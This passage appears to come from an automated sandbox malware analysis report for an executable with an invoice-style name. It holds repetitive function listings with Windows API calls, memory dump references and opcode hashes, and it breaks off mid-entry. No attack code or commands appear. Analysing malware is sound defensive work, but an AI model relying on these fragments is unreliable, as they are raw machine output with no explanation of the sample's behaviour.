                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharNext
                • String ID: C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 3213498283-2038086183
                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                Function 00405DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3355392842
                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001), ref: 0040302C
                • GetTickCount.KERNEL32 ref: 0040304A
                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                • ShowWindow.USER32(00000000,00000005), ref: 00403075
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                Function 004063E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,00000000,?,?,?,?,: Completed,?,?,0040664F,80000002), ref: 0040642E
                • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed,?), ref: 00406439
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CloseQueryValue
                • String ID: : Completed
                • API String ID: 3356406503-2954849223
                • Opcode ID: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                • Opcode Fuzzy Hash: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                Function 00403B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • FreeLibrary.KERNEL32(?,76A13420,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                • GlobalFree.KERNEL32(00000000), ref: 00403B55
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-3355392842
                • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                Function 00405E35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 00405E3B
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 00405E4B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3370423016
                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction ID: cbb238d5cba983021c059698dd1e30487a08ad5c01a1b7d12c600bff718c79a2
                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction Fuzzy Hash: 0ED05EB2410A209AC3126708EC04A9F63ACEF5570074A4427E581A61A4E7785E818AE8
                Function 00405F6F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405F7F
                • lstrcmpiA.KERNEL32(?,?), ref: 00405F97
                • CharNextA.USER32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FA8
                • lstrlenA.KERNEL32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB1
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8

                Executed Functions

                Function 07A7BEFE Relevance: 1.8, Instructions: 1844COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 58856cd595d4cb148310908430179fc9e7d1d408c9ac2a57ebe1029af5bab530
                • Instruction ID: 54aaa5e283bbd584e165237d0673d43cb3bcc7178e297813a4e991403c6486ca
                • Opcode Fuzzy Hash: 58856cd595d4cb148310908430179fc9e7d1d408c9ac2a57ebe1029af5bab530
                • Instruction Fuzzy Hash: F2034DB4A00719DFE724DB64CC90BAAB7F2BF85305F1084A9D9196B385CB71AD81CF91
                Function 033C8060 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b1f54b12a3e85dd89a8a39c07c8ed383e2c41efbd8112a9db16b7d1d77644068
                • Instruction ID: c9d01d89e6840468287f4f6496d3d52a612aa1ff4fed9aaf55b7f8c07336e259
                • Opcode Fuzzy Hash: b1f54b12a3e85dd89a8a39c07c8ed383e2c41efbd8112a9db16b7d1d77644068
                • Instruction Fuzzy Hash: 70B15B70E10249DFDB10CFA9DC8579EBBF2AF88714F18812DD819AB254EB749D45CB81
                Function 033C8930 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28f20561c2840d21e061415b907e1ca39c88d875ad7f6a64423edb14d6c797b2
                • Instruction ID: 5250278ccc9d4fbc23cf8feafcaa5319355eb4bdfbadefa81f076f6b97c61d95
                • Opcode Fuzzy Hash: 28f20561c2840d21e061415b907e1ca39c88d875ad7f6a64423edb14d6c797b2
                • Instruction Fuzzy Hash: A4B16C70E102498FDB10CFA9D8C179EFBF2AF88754F18812DD815AB254EB749D85CB81
                Function 07A7CCDE Relevance: 1.2, Instructions: 1234COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f98e7c690e0b9614ac32713188d22e8548db1312cbb3c06e9c3ba39d9b7d2a8e
                • Instruction ID: cc0782341b1a17e831889e3ee522b0af5adc7a6a3e631b5e8d50917a7d052e33
                • Opcode Fuzzy Hash: f98e7c690e0b9614ac32713188d22e8548db1312cbb3c06e9c3ba39d9b7d2a8e
                • Instruction Fuzzy Hash: BEC281B4A01715DFE724DB60CC90BAAB7F6EF89305F1084A9D8196B385CB71AD81CF91
                Function 07A72D60 Relevance: 1.2, Instructions: 1166COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 089785ecb61fd6786fcc4dd9ee85010ee0920dff8e1b4b9ff7391cc855e55687
                • Instruction ID: ace32d0c2d50bbf4e5dbe6d8bfcbdcaa967b23f6fdf7cf6d6f389261df12ad7c
                • Opcode Fuzzy Hash: 089785ecb61fd6786fcc4dd9ee85010ee0920dff8e1b4b9ff7391cc855e55687
                • Instruction Fuzzy Hash: FEA2C3B4A00355DFEB24DB64CC50BAEB7F2AF85305F11C4A9D51A6B385CB71AC81CBA1
                Function 07A74D70 Relevance: 1.1, Instructions: 1118COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3c65709f89a873b90b686d1f3527007e077fa130bb09515d38157c4d9e45e7a
                • Instruction ID: bb60c8a912b5c6d06025e196dd2d7183f363b0a11517455b29d671318b185d3f
                • Opcode Fuzzy Hash: c3c65709f89a873b90b686d1f3527007e077fa130bb09515d38157c4d9e45e7a
                • Instruction Fuzzy Hash: BFA281B0F10315DFE728CBA4C454B6977B2AB85305F258168D815AF392CBB1EC92CF91
                Function 07A74D4E Relevance: .9, Instructions: 910COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 422a7bdb6ad7b147db291548e453b009abae30e92d2746cdab0cebd448233185
                • Instruction ID: 4524a32d517a33c6e6bdd2e1d673fd8dbb42d73aac32f03c6218a266cc13ddf2
                • Opcode Fuzzy Hash: 422a7bdb6ad7b147db291548e453b009abae30e92d2746cdab0cebd448233185
                • Instruction Fuzzy Hash: CD8280B0E00315DFE728CB64C844FA977B2EB89315F258159D914AB392C7B2EC96CF91
                Function 07A73F1A Relevance: .9, Instructions: 888COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 494ba84a94b05c52bb91c01bd15e7107fd208a04e925ce1de686263531956ee7
                • Instruction ID: c26d078203470f5ac05844b724d331b69e2dbb87e225ba4f3747b909a05b35d7
                • Opcode Fuzzy Hash: 494ba84a94b05c52bb91c01bd15e7107fd208a04e925ce1de686263531956ee7
                • Instruction Fuzzy Hash: 98828274A00355DFE724DB60CC50BAEB7B2AF89305F10C9A9D55A6B345CB71AC82CFA1
                Function 07A74E0D Relevance: .8, Instructions: 848COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4abc0de561c591f9d5c501eea83563cbe9556bf87c7c6a6d57dafe8bcee1c9a
                • Instruction ID: 15682fbecc1c7e3c1c09cc2271b2b5967d458f3994064f5655c87b5c3dcbd951
                • Opcode Fuzzy Hash: b4abc0de561c591f9d5c501eea83563cbe9556bf87c7c6a6d57dafe8bcee1c9a
                • Instruction Fuzzy Hash: 5C827EB0E10315DFE728CB64C844BA977B2EB84709F258158D915AF392C7B2EC96CF91
                Function 08FD0970 Relevance: .7, Instructions: 679COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76792302382.0000000008FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FD0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_8fd0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e341073d486426d2fb79a9314e22bb942075c9f9a119fc8411440981656694e1
                • Instruction ID: c1e584e34491d30eac6d466e9084349985fec85490813abb83ea26b9fc5a3125
                • Opcode Fuzzy Hash: e341073d486426d2fb79a9314e22bb942075c9f9a119fc8411440981656694e1
                • Instruction Fuzzy Hash: 4032BE75A04305DFDB24CBB5C454BAABBA2AFC9212F18C06ADA059B255CF71DC42CBA1
                Function 07A740E7 Relevance: .6, Instructions: 646COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79f26371713a278018cc7ab3264c3fd579c8c69ca69489c4854d4ff1d227a1c9
                • Instruction ID: 163680b8e34e6fd2d3c7d4736ed967fec93ff7d4f6fb609d4f01cc41a692ae1b
                • Opcode Fuzzy Hash: 79f26371713a278018cc7ab3264c3fd579c8c69ca69489c4854d4ff1d227a1c9
                • Instruction Fuzzy Hash: B8528174A00765DFE724DB20CC50BAEB7B2AF85305F10C899D55A6B385CB71AC86CFA1
                Function 033C4310 Relevance: .6, Instructions: 626COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
